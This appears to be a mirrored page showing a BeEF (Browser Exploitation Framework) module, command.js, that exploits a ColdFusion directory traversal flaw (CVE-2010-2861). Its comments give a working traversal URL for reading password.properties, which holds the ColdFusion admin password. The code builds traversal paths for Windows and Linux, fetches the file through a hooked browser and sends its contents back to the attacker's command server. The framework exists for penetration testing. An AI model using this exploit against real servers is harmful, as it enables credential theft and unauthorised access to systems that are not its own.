Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/exploits/coldfusion_dir_traversal_exploit/command.js
1154 views
1
//

2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
/**

8
 * ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor .

9
 * Inject into the vulnerable "locale" parameter the classic payload of a directory traversal.

10
 * By default the exploit will retrieve the password.properties file, where the CF admin passwd is stored:

11
 * the user is free to specify any other path that will be appended to the server root (ie C:\ on Windows)

12
 *

13
 * On a default win installation, the following vector works great:

14
 * http://127.0.0.1:8500/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\ColdFusion8\lib\password.properties%00en

15
 * demo CF application-> http://blogs.sitepoint.com/applications-coldfusion-8/

16
 */

17
beef.execute(function() {

18
   fileToRetrieve = "<%= @fileToRetrieve %>";

19
   targetOS = "<%= @os_combobox %>";

20
   cf_version = "<%= @cf_version %>";

21
   var uri = null;

22
   if(targetOS == "Windows"){

23
       uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\\ColdFusion' + cf_version + '\\lib\\' + fileToRetrieve + '%00en';

24
   }else{

25
       uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../../opt/coldfusion' + cf_version + '/lib/' + fileToRetrieve + '%00en';

26
   }

27


28
	beef.net.request("http", "GET", document.domain, document.location.port, uri,null, null, 10, 'text', function(response){

29
         if(response.status_code == "success"){

30
            titleStart = response.response_body.indexOf("<title>");

31
            titleEnd = response.response_body.indexOf("</title>");

32
            exploitResults = response.response_body.substring(titleStart + 7,titleEnd);

33
            beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=Retrieved contents for file [" + fileToRetrieve + "]: " + exploitResults);

34
         }else{

35
             beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: directory traversal failed.");

36
         }

37
    });

38
});

39